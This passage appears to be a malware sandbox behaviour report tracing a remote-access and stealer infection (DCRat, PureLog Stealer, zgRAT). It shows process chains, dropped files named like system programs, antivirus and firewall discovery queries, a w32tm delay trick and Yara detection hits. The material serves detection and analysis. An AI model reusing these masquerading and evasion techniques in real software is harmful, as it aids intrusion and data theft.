                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\savesSession\4pVzEVKfbvkCEJ9qYser3z0xImhTTPHqTDWOugPvvPYsbZ7.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\savesSession\ComponentBrokermonitor.exe "C:\savesSession/ComponentBrokermonitor.exe"Jump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uT6K3ltlhZ.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe" Jump to behavior
                          Source: RuntimeBroker.exe, 00000009.00000002.2887155289.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerp
                          Source: RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N"},"5.0.4",5,1,"","user","980108","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Recovery","GXCTDM5 (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States","New York / New York","40.7123 / -74.0068"]8*
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E1F654 cpuid 0_2_00E1F654
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00E1AF0F
                          Source: C:\savesSession\ComponentBrokermonitor.exeQueries volume information: C:\savesSession\ComponentBrokermonitor.exe VolumeInformationJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E1DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00E1DF1E
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E0B146 GetVersionExW,0_2_00E0B146
                          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.2887155289.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.1770434418.0000000012E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ComponentBrokermonitor.exe PID: 3492, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 6340, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: 4.0.ComponentBrokermonitor.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000003.1646097008.0000000006A4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000000.1733341807.0000000000982000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\savesSession\ComponentBrokermonitor.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Default\Videos\OfficeClickToRun.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\jDownloader\config\dllhost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\savesSession\winlogon.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exe, type: DROPPED
                          Yara detected zgRAT
                          Source: Yara matchFile source: 4.0.ComponentBrokermonitor.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\savesSession\ComponentBrokermonitor.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Default\Videos\OfficeClickToRun.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\jDownloader\config\dllhost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\savesSession\winlogon.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exe, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
